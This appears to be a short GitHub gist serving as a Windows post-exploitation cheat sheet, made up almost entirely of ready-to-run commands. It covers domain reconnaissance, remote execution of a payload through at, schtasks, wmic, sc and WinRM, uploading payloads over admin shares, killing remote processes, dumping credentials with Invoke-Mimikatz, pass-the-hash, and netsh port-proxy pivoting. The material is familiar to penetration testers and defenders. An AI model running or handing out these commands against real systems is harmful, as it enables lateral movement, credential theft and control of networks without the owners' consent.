@infosecn1nja
Created July 22, 2017 01:07

Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights

dir \\host\C$
at \\host

Execute : at

net time \\host
at \\host HH:MM c:\windows\temp\foobar.exe

Execute : SCHTASKS

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host

Execute : wmic

wmic /node:host process call create "c:\windows\temp\foobar.exe"

Execute : sc

sc \\host create foobar binpath= "c:\windows\temp\foobar.exe"
sc \\host start foobar

Execute : WinRM

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }

Upload && Download

C$ : C:\
ADMIN$ : %SYSTEMROOT% (C:\Windows\)

Upload:
copy payload.exe \\host\ADMIN$\temp\

Download:
copy \\host\ADMIN$\temp\payload.exe payload.exe

Process Manipulation

List Process:
tasklist /v /S TARGET

Kill Process:
taskkill /S TARGET /PID PID /F

Mimikatz

Invoke-Mimikatz -ComputerName TARGET
Invoke-Mimikatz -ComputerName TARGET -Command command

Pass-the-hash Mimikatz

mimikatz sekurlsa::pth /user:Administrator /ntlm:<ntlm> /run:"cmd.exe"

Pivoting

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>